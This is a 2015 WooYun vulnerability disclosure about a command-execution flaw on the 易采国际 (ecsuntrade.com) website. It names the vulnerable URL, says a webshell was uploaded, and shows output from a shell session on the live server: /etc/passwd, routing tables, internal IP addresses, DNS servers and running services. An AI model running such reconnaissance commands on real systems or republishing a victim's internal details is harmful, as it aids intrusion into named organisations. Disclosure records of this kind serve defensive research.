易采国际官网getshell | wooyun-2015-0152285| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152285

漏洞标题：易采国际官网getshell

漏洞作者：朱元璋

提交时间：2015-11-06 15:48

修复时间：2015-12-21 15:50

公开时间：2015-12-21 15:50

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-12-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国对外承包工程商会和临沂市政府于2014年建立战略合作伙伴关系，组建专业团队搭建“易采国际”平台，为国际工程企业提供一站式物资设备采购服务。
具体简介http://linyi.iqilu.com/lyshizheng/2014/0627/2043559.shtml

详细说明：

打开官网http://www.ecsuntrade.com/index/index_execute.html，链接地址http://www.ecsuntrade.com/index/footer/footer!about.action存在命令执行漏洞

直接上传木马到服务器

漏洞证明：

[/usr/local/tomcat/webapps/ROOT/]$ netstat -rn
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
192.168.10.6    0.0.0.0         255.255.255.255 UH        0 0          0 tun0
192.168.10.0    192.168.10.6    255.255.255.0   UG        0 0          0 tun0
10.172.192.0    0.0.0.0         255.255.248.0   U         0 0          0 eth0
169.254.0.0     0.0.0.0         255.255.0.0     U         0 0          0 eth0
192.168.0.0     10.172.199.247  255.255.0.0     UG        0 0          0 eth0
172.16.0.0      10.172.199.247  255.240.0.0     UG        0 0          0 eth0
100.64.0.0      10.172.199.247  255.192.0.0     UG        0 0          0 eth0
10.0.0.0        10.172.199.247  255.0.0.0       UG        0 0          0 eth0
0.0.0.0         10.172.199.247  0.0.0.0         UG        0 0          0 eth0
[/usr/local/tomcat/webapps/ROOT/]$ netsat -tnlp
/bin/sh: netsat: command not found
[/usr/local/tomcat/webapps/ROOT/]$ cat /proc/net/netlink
Run command [cat /proc/net/netlink] failed!
[/usr/local/tomcat/webapps/ROOT/]$ ps aux | grep udev
root       372  0.0  0.0  10752   788 ?        S<s  Apr03   0:00 /sbin/udevd -d
root      1040  0.0  0.0  10752   764 ?        S<   Apr03   0:00 /sbin/udevd -d
root      1041  0.0  0.0  10752   748 ?        S<   Apr03   0:00 /sbin/udevd -d
tomcat   12622  0.0  0.0 106096  1176 ?        S    11:58   0:00 /bin/sh -c cd "/usr/local/tomcat/webapps/ROOT/";ps aux | grep udev;echo [S];pwd;echo [E]
tomcat   12624  0.0  0.0 103256   844 ?        S    11:58   0:00 grep udev
[/usr/local/tomcat/webapps/ROOT/]$ lsb_release -a
LSB Version:	:base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch
Distributor ID:	CentOS
Description:	CentOS release 6.5 (Final)
Release:	6.5
Codename:	Final
[/usr/local/tomcat/webapps/ROOT/]$ w #
Run command [w #] failed!
[/usr/local/tomcat/webapps/ROOT/]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tomcat:x:500:500::/home/tomcat:/bin/bash
zabbix:x:498:499:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[/usr/local/tomcat/webapps/ROOT/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3E:00:47:6B  
          inet addr:10.172.192.200  Bcast:10.172.199.255  Mask:255.255.248.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1947691878 errors:0 dropped:0 overruns:0 frame:0
          TX packets:441015158 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:117970625321 (109.8 GiB)  TX bytes:91374939586 (85.0 GiB)
          Interrupt:164 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:364 errors:0 dropped:0 overruns:0 frame:0
          TX packets:364 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:35948 (35.1 KiB)  TX bytes:35948 (35.1 KiB)
tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:192.168.10.5  P-t-P:192.168.10.6  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:2794161 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2461976 errors:0 dropped:3275 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:2718697775 (2.5 GiB)  TX bytes:1602616473 (1.4 GiB)
[/usr/local/tomcat/webapps/ROOT/]$ cat /etc/resolv.conf
options timeout:1 attempts:1 rotate
nameserver 10.202.72.118
nameserver 10.202.72.116
[/usr/local/tomcat/webapps/ROOT/]$ bash prompt:
bash: prompt:: No such file or directory
[/usr/local/tomcat/webapps/ROOT/]$ chkconfig --list
abrt-ccpp      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
abrtd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
acpid          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
aegis          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
atd            	0:off	1:off	2:off	3:off	4:off	5:off	6:off
auditd         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
blk-availability	0:off	1:on	2:off	3:off	4:off	5:off	6:off
cpuspeed       	0:off	1:on	2:off	3:off	4:off	5:off	6:off
crond          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
gshelld        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
haldaemon      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ip6tables      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
iptables       	0:off	1:off	2:on	3:on	4:on	5:on	6:off
irqbalance     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
kdump          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
lvm2-monitor   	0:off	1:on	2:off	3:off	4:off	5:off	6:off
mdmonitor      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
messagebus     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
netconsole     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
netfs          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
network        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
nfs            	0:off	1:off	2:on	3:on	4:on	5:on	6:off
nfslock        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
nscd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
ntpd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
ntpdate        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
postfix        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
psacct         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
quota_nld      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rdisc          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
restorecond    	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rngd           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rpcbind        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
rpcgssd        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rpcsvcgssd     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rsyslog        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
saslauthd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
smartd         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sshd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
svnserve       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sysstat        	0:off	1:on	2:on	3:on	4:on	5:on	6:off
udev-post      	0:off	1:on	2:on	3:on	4:on	5:on	6:off
zabbix-agent   	0:off	1:off	2:off	3:off	4:off	5:off	6:off
[/usr/local/tomcat/webapps/ROOT/]$

修复方案：

加强安全意识

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

评价

2015-11-06 18:17 | 撸管 ( 路人 | Rank:6 漏洞数:6 | 温柔风情吾二郎)

目测st2

WooYun.org

漏洞概要 关注数(24) 关注此漏洞